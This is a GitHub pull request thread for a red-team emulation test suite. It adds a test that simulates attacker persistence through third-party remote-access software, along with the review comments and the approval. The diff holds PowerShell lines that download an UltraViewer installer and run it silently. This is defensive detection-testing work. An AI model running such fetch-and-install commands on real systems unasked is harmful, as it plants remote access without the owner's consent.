### PR TITLE
T1219 update

### PR DESCRIPTION
**Pull request by 100687344**
**Details:**

**Testing:**

**Associated Issues:**

### CODE REVIEW

File: atomics/T1219/T1219.yaml [hunk 1]
```diff
@@ -175,4 +175,33 @@ atomic_tests:
...
+      type: Path
+      default: $env:temp\T1219Setup.exe
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      UltraViewer must be downloaded and exist on the disk at the specified location. (#{UltraViewer_Path})
+    prereq_command: |
+      if (Test-Path #{UltraViewer_Path}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Start-BitsTransfer -Source "https://nsproducts.azureedge.net/nsm-1270/en/Setup.exe" -Destination "$env:temp\T1219Setup.exe" -dynamic
```
Comment (clr2of8) [inline atomics/T1219/T1219.yaml:197]: Could you use the #{UltraViewer_Path} variable to specify the Destination output file?

File: atomics/T1219/T1219.yaml [hunk 2]
```diff
@@ -175,4 +175,33 @@ atomic_tests:
...
+  executor:
+    command: |
+      Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\UltraViewer.exe https://www.ultraviewer.net/en/UltraViewer_setup_6.5_en.exe
+      Start-Process -Wait -FilePath "C:\Users\$env:username\Desktop\UltraViewer.exe" -Argument "/silent" -PassThru
```
Comment (clr2of8) [inline atomics/T1219/T1219.yaml:201]: Do you want to have the download and install be part of the attack commands as you have it here or as a prerequisite? If you want to have that be part of the "attack" then could you put a cleanup command that uninstalls it so the test can be repeated over and over? Or if you prefer it to be a prerequisite that is only run once, then move these to the dependency section and don't add the cleanup command to uninstall.

**Review by clr2of8 — CHANGES_REQUESTED** [review]

**Comment by 100687344** [comment]
Carrie, Thanks for pointing out these issues. This will be my first try at an atomic. I’ll work on fixing them and send it back. Thank you. Sent from my iPhoneOn Aug 17, 2022, at 15:22, Carrie Roberts ***@***.***> wrote:﻿
@clr2of8 requested changes on this pull request.



In atomics/T1219/T1219.yaml:
> +    A recent trend by threat actors, once a foothold is established, maintain long term persistence using third party remote services such as UltraViewer to provide the operator with access to the network using legitimate services. 
+  supported_platforms:
+  - windows
+  input_arguments:
+    UltraViewer_Path:
+      description: Path to the UltraViewer executable. 
+      type: Path
+      default: $env:temp\T1219Setup.exe
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      UltraViewer must be downloaded and exist on the disk at the specified location. (#{UltraViewer_Path})
+    prereq_command: |
+      if (Test-Path #{UltraViewer_Path}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Start-BitsTransfer -Source "https://nsproducts.azureedge.net/nsm-1270/en/Setup.exe" -Destination "$env:temp\T1219Setup.exe" -dynamic

Could you use the #{UltraViewer_Path} variable to specify the Destination output file?



In atomics/T1219/T1219.yaml:
> +      Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\UltraViewer.exe https://www.ultraviewer.net/en/UltraViewer_setup_6.5_en.exe
+      Start-Process -Wait -FilePath "C:\Users\$env:username\Desktop\UltraViewer.exe" -Argument "/silent" -PassThru

Do you want to have the download and install be part of the attack commands as you have it here or as a prerequisite? If you want to have that be part of the "attack" then could you put a cleanup command that uninstalls it so the test can be repeated over and over? Or if you prefer it to be a prerequisite that is only run once, then move these to the dependency section and don't add the cleanup command to uninstall.

**Review by clr2of8 — APPROVED** [review]
Excellent work! Thank you for your first-time contribution. Don't forget to claim your [free t-shirt for being a contributor](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing#claim-your-free-t-shirt).

**Pull request merged**